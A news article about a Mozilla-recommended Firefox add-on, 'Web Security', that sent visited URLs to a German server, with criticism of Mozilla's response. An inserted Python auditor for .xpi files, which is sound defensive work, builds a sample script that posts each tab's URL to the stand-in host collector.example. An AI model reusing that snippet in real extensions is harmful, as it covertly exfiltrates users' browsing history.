Mozilla recommended privacy extension had "phone-home" feature
A Firefox extension that Mozilla recommended on its official Firefox blog as one of the extensions that make the "Firefox browser a privacy superpower" had phone-home functionality built in: on every page load, it submitted the current URL and previously visited URLs to a server in Germany.
Web Security, the name of the add-on, claims to protect users actively "from malware, tampered websites or phishing sites". The extension has more than 223,000 users according to Mozilla AMO and a rating of 3.7 out of 5.
Mozilla wrote on the official site:
Web Security is a sophisticated browser add-on that uses an extensive database to prevent websites from harming your computer or obtaining your sensitive data. Users are often lured to open counterfeit websites of banks, by convincing emails. The Web Security extension will help you detect these counterfeit sites so that you will not be decoyed to enter your sensitive information where it is not safe.
The organization removed the recommendation from the official blog post after allegations were made that the extension transmitted data to a server in Germany on every connection.
Mike Kuketz published an analysis on his German blog. The extension Web Security transmits encrypted information over an insecure connection whenever a domain is visited in the browser.
A quick check with the network analyzer Wireshark confirmed the finding. Web Security communicates with a server IP address whenever a new page is loaded in a Firefox browser that has the extension installed.
The data is encrypted; interested users can find the function in include/background.js after extracting the extension, and will see that it submits visited URLs to the server.
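A first-pass version of the check described above, as an added example that is not taken from the original article or from the extension's code: it opens an .xpi file (a zip archive) and flags JavaScript files that both listen for tab or navigation events and make network calls, and it also reports hard-coded http:// endpoints. The sample archive, the host collector.example and the encode() helper are constructed for illustration.

```python
import io
import re
import zipfile

# Patterns a reviewer would flag in a WebExtension background script.
PATTERNS = {
    "tab-url-listener": re.compile(r"\b(?:browser|chrome)\.(?:tabs\.onUpdated|webNavigation\.\w+|webRequest\.\w+)\.addListener"),
    "network-call": re.compile(r"\bXMLHttpRequest\b|\bfetch\s*\(|\bnavigator\.sendBeacon\b"),
    "plaintext-endpoint": re.compile(r"""["']http://[^"'\s]+["']"""),
}

def audit_xpi(data: bytes) -> dict:
    """Return {js_path: {finding: [line numbers]}} for an .xpi (a zip archive)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        for name in (n for n in xpi.namelist() if n.endswith(".js")):
            text = xpi.read(name).decode("utf-8", errors="replace")
            hits = {}
            for lineno, line in enumerate(text.splitlines(), 1):
                for label, rx in PATTERNS.items():
                    if rx.search(line):
                        hits.setdefault(label, []).append(lineno)
            if hits:
                report[name] = hits
    return report

def phones_home(findings: dict) -> bool:
    """A file that both observes tab URLs and makes network calls needs manual review."""
    return {"tab-url-listener", "network-call"} <= set(findings)

def build_sample_xpi() -> bytes:
    """Constructed sample archive, NOT the real extension's code."""
    js = (
        "browser.tabs.onUpdated.addListener(function (id, change, tab) {\n"
        "  var xhr = new XMLHttpRequest();\n"
        "  xhr.open('POST', 'http://collector.example/check');\n"
        "  xhr.send(encode(tab.url));\n"  # encode() is a hypothetical helper
        "});\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", '{"name": "sample"}')
        z.writestr("include/background.js", js)
        z.writestr("include/options.js", "console.log('ok');\n")
    return buf.getvalue()

if __name__ == "__main__":
    for path, findings in audit_xpi(build_sample_xpi()).items():
        print(path, findings, "REVIEW" if phones_home(findings) else "")
```

A hit only marks a file for manual reading; what is actually sent still has to be confirmed in the code or on the wire, as was done here with Wireshark.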
When the user opens the pages, used by Web Security, the following information gets processed to assure the successful operation of Web Security: the web pages that the user opens or the operating web server, the name of the internet service provider of the user and the website from which the user came from and the sub-pages the user opened.
The main issue for Firefox users is not that a privacy extension submits information to a server on every visit; that is bad but it has happened in the past and it will continue to happen as extensions are not reviewed manually anymore before they are published on AMO.
The main issue is that Mozilla recommended the extension on the official company blog as a privacy-enhancing extension. The article still states that the collection includes 14 privacy extensions, while only 13 are listed due to the removal of Web Security from the listing.
When Mozilla noticed the error in judgement, it removed the recommendation but did not update the article to inform users about the removal.
The blog post has no author attached to it, so it is unclear who published the recommendations.
Now You: What is your take?